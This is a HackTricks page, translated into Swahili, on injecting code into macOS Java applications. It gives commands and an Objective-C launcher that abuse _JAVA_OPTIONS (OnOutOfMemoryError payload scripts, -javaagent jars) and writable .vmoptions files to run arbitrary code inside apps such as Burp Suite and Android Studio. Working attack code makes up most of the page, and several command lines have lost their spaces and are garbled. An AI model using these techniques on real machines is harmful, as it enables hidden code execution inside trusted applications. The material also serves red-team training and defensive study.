Pata programu za Java zilizowekwa kwenye mfumo wako. Iligundulika kuwa programu za Java katika Info.plist zitakuwa na baadhi ya vigezo vya java ambavyo vina nyuzi java., hivyo unaweza kutafuta hilo:
# Search only in /Applications foldersudofind/Applications-name'Info.plist'-execgrep-l"java\."{} \; 2>/dev/null# Full searchsudofind/-name'Info.plist'-execgrep-l"java\."{} \; 2>/dev/null
_JAVA_OPTIONS
Kigezo cha mazingira _JAVA_OPTIONS kinaweza kutumika kuingiza vigezo vya java vya kiholela katika utekelezaji wa programu iliyotengenezwa kwa java:
# Write your payload in a script called /tmp/payload.shexport _JAVA_OPTIONS='-Xms2m -Xmx5m -XX:OnOutOfMemoryError="/tmp/payload.sh"'"/Applications/Burp Suite Professional.app/Contents/MacOS/JavaApplicationStub"
Ili kuitekeleza kama mchakato mpya na si kama mtoto wa terminal ya sasa unaweza kutumia:
#import <Foundation/Foundation.h>
// clang -fobjc-arc -framework Foundation invoker.m -o invoker
int main(int argc, const char * argv[]) {
@autoreleasepool {
// Specify the file path and content
NSString *filePath = @"/tmp/payload.sh";
NSString *content = @"#!/bin/bash\n/Applications/iTerm.app/Contents/MacOS/iTerm2";
NSError *error = nil;
// Write content to the file
BOOL success = [content writeToFile:filePath
atomically:YES
encoding:NSUTF8StringEncoding
error:&error];
if (!success) {
NSLog(@"Error writing file at %@\n%@", filePath, [error localizedDescription]);
return 1;
}
NSLog(@"File written successfully to %@", filePath);
// Create a new task
NSTask *task = [[NSTask alloc] init];
/// Set the task's launch path to use the 'open' command
[task setLaunchPath:@"/usr/bin/open"];
// Arguments for the 'open' command, specifying the path to Android Studio
[task setArguments:@[@"/Applications/Android Studio.app"]];
// Define custom environment variables
NSDictionary *customEnvironment = @{
@"_JAVA_OPTIONS": @"-Xms2m -Xmx5m -XX:OnOutOfMemoryError=/tmp/payload.sh"
};
// Get the current environment and merge it with custom variables
NSMutableDictionary *environment = [NSMutableDictionary dictionaryWithDictionary:[[NSProcessInfo processInfo] environment]];
[environment addEntriesFromDictionary:customEnvironment];
// Set the task's environment
[task setEnvironment:environment];
// Launch the task
[task launch];
}
return 0;
}
Hata hivyo, hiyo itasababisha kosa kwenye programu iliyotekelezwa, njia nyingine ya siri zaidi ni kuunda wakala wa java na kutumia:
export _JAVA_OPTIONS='-javaagent:/tmp/Agent.jar'"/Applications/Burp Suite Professional.app/Contents/MacOS/JavaApplicationStub"# Oropen--env"_JAVA_OPTIONS='-javaagent:/tmp/Agent.jar'"-a"Burp Suite Professional"
Kuunda wakala kwa toleo tofauti la Java kutoka kwa programu kunaweza kusababisha kuanguka kwa utekelezaji wa wakala na programu zote mbili
Na kisha peleka variable ya env na uendeshe programu ya java kama:
export _JAVA_OPTIONS='-javaagent:/tmp/j/Agent.jar'"/Applications/Burp Suite Professional.app/Contents/MacOS/JavaApplicationStub"# Oropen--env"_JAVA_OPTIONS='-javaagent:/tmp/Agent.jar'"-a"Burp Suite Professional"
vmoptions file
Faili hili linaunga mkono uainishaji wa Java params wakati Java inatekelezwa. Unaweza kutumia baadhi ya hila za awali kubadilisha java params na kufanya mchakato utekeleze amri zisizo za kawaida.
Zaidi ya hayo, faili hili linaweza pia kujumuisha wengine kwa kutumia saraka ya include, hivyo unaweza pia kubadilisha faili iliyojumuishwa.
Zaidi ya hayo, baadhi ya programu za Java zitakuwa zinaweza kupakia zaidi ya faili moja ya vmoptions.
Baadhi ya programu kama Android Studio zinaonyesha katika matokeo yao wanatazamia faili hizi, kama:
Ikiwa hawafanyi hivyo, unaweza kuangalia kwa urahisi kwa:
# Monitorsudoesloggerlookup|grepvmoption# Give FDA to the Terminal# Launch the Java app/Applications/Android\Studio.app/Contents/MacOS/studio
Note how interesting is that Android Studio in this example is trying to load the file /Applications/Android Studio.app.vmoptions, a place where any user from the admin group has write access.
HackTricks Training AWS Red Team Expert (ARTE)
HackTricks Training GCP Red Team Expert (GRTE)